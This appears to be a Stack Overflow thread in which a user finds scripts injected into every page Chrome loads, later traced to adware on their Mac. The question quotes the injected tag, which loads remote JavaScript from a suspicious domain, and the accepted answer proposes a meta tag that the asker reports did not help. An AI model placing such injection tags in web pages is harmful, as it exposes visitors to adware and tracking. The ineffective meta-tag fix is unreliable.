# Why does chrome inject a script into every page

Tags: google-chrome

I displayed a static web in tomcat and accessed web by Chrome. But chrome always injected a script into my web. Whether local host or remote host. my Firefox and  other computer did not appeared this question.
Below is my web content.
I did not import any script

```html
<!DOCTYPE HTML>
<html>
   <head>

   </head>
   <body>
      <div id="sse">
         <a href="#">Run WebSocket</a>
      </div>
   </body>
</html>
```

[enter image description here](https://i.stack.imgur.com/j064m.png)

After loaded web

[enter image description here](https://i.stack.imgur.com/3ott0.png)

Below code always is injected web

```html
<script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.js"></script>
<script src="http://4175ae3358af4d9eb16af2900fb72113.com/static/get-js?dc_id=DP7138AAAAAA&amp;sub_id=0001&amp;id=855EA4EA-7FFF-47BF-92D6-A152871C3248&amp;v=1000040"></script>
```

I disable all chrome extensions

I disable all chrome plugins

I scan my computer to not find any virus

Below is my chrome version. I go back older version. the question still exists

**Google Chrome**   47.0.2526.106 (Official Build) (64-bit)
**Revision**    19b9e1a5713f4b9ae324bd59bbe16ca6eb91d0e0-refs/branch-heads/2526@{#532}
**OS**  Mac OS X 
**Blink**   537.36 (@19b9e1a5713f4b9ae324bd59bbe16ca6eb91d0e0)
**JavaScript**  V8 4.7.80.25

Comment: this will work for u https://gist.github.com/tavisrudd/1174381

Comment: I already figure out this question.  my computer infected malware
follow this: [Remove virus from Apple Mac OS X](https://malwaretips.com/blogs/remove-mac-os-x-virus/)

Answer (score 0, accepted):

Try this in your document head:

```
<meta name="disable-extension-feature" content="read-dom" />
```

**UPDATE**

You are facing this issue due to "cdncache-a.akamaihd.net".

You need to disable this, for more detail follow https://malwaretips.com/blogs/cdncache1-a-akamaihd-net-removal/

Comment: Thanks but it is not work. Maybe that script is not injected to web by extension. because I disable all extensions and plugins of chrome

Comment: @user3355722: than check is there any extra js or html file in your source code

Comment: I test a static web page. The source code in the post above. it is very simple
`<!DOCTYPE HTML>
<html>
   <head>
  <meta name="disable-extension-feature" content="read-dom" />
   </head>
   <body>
      <div id="sse">
         <a href="#">Run WebSocket</a>
      </div>
   </body>
</html>`

Comment: And I accessed other website. the script alse is injected.

Comment: only in google chrome? did u try reinstall? @user3355722

Comment: Yes.  only in google chrome  and I reinstall v42 and v47. this question still exists

Comment: follow this: https://malwaretips.com/blogs/cdncache1-a-akamaihd-net-removal/ @user3355722